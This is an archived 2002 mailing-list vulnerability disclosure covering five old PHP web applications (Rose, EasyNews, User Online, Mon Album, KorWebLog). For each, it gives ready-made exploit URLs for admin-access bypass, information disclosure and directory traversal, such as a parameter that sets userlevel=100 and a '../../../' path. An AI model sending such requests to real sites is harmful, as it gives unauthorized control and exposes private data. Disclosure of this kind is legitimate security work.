('binary' encoding is not supported, stored as-is) Hello people :) Product 1 : *********** Rose http://www.jinxm.co.uk Version : 4.52 Problem : - Admin access Exploit : - newsadmin/upload.php?userinfo[username]=hop&userinfo[userlevel]=100 Product 2 : *********** EasyNews http://www.webrc.ca Version : 4.3 Problem : - Admin access Exploits : - admin.php?en_log_id=0&action=users - admin.php?en_log_id=0&action=config Product 3 : *********** User Online http://www.elpar.net Version : 2.0 Problem : - Informations recovery Exploit : - /ip.txt Product 4 : *********** Mon Album http://www.3dsrc.com Version : 0.6.2d Problems : - Informations recovery - Admin access Exploits : - admin/admin_phpinfo.php4 - admin.php4?reg_login=1 Product 5 : *********** KorWebLog http://weblog.kldp.org/ http://eunjea.sourceforge.net/ Version : 1.5.8 Problems : - Path disclosure - HD's files listing Exploits : - viewimg.php?path=viewimg.php&form=1&var=1 - viewimg.php?path=../../../path/to/list&form=1&var=1 More details in french : http://www.ifrance.com/kitetoua/tuto/5holes7.txt Translated by google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com% 2Fkitetoua%2Ftuto%2F5holes7.txt&langpair=fr%7Cen&hl=fr&prev=% 2Flanguage_tools frog-m@n
This archive was generated by hypermail 2b30 : Thu Jun 06 2002 - 09:32:26 PDT